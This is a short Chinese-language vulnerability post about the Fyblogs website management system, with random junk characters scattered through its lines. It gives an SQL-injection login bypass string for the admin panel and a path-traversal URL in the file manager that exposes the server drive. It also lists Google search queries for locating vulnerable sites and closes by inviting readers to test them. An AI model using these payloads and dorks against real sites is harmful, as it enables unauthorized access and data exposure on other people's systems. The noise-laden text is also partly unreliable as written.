漏洞类型: 未授权访问/权限绕过
# @: I$ o. Z. d3 j* K0 i7 n b6 S) O# g! v. Q, D4 C
简要描述:. _- g; M( J$ m2 d! T
; D. F, t7 F6 Z3 Z3 H) JFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
7 @. r( X& Y1 {/ w1 N/ T' A: t0 @# d1 Z8 p9 J K/ P& t+ `
详细说明: S4 `' Q9 P5 O( p0 [$ j' P
0 L; W( i) o9 R+ g4 `3 F后台万能密码 'or'='or'
. A' @0 J) J2 v7 l0 N后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
( m" e& Z" H3 e( K3 M; x' uadmin/uploadfile.asp?currentFolder=/upfiles/../1 x4 X8 a6 a! M3 E" s* Z$ f
; J8 K) `( X, T; y1 O. E漏洞证明:
/ _' v( p( j5 G* o9 @" J
8 b( ?& w6 O# ]$ i' Q" Q+ }谷歌:inurl:type.asp?id=1 新闻中心8 Y" v& @ ^, F W: ^ J; u) Y) m
或者 :inurl:download_ok.asp?4 d% g" ~' g& d& [; a* j! f
3 n: T6 z$ d# \7 D' y
可以测试
* U2 u/ ^# S' u- v4 P+ e( [ ~- n) G% z9 q
. p! v6 T, Y# A2 B |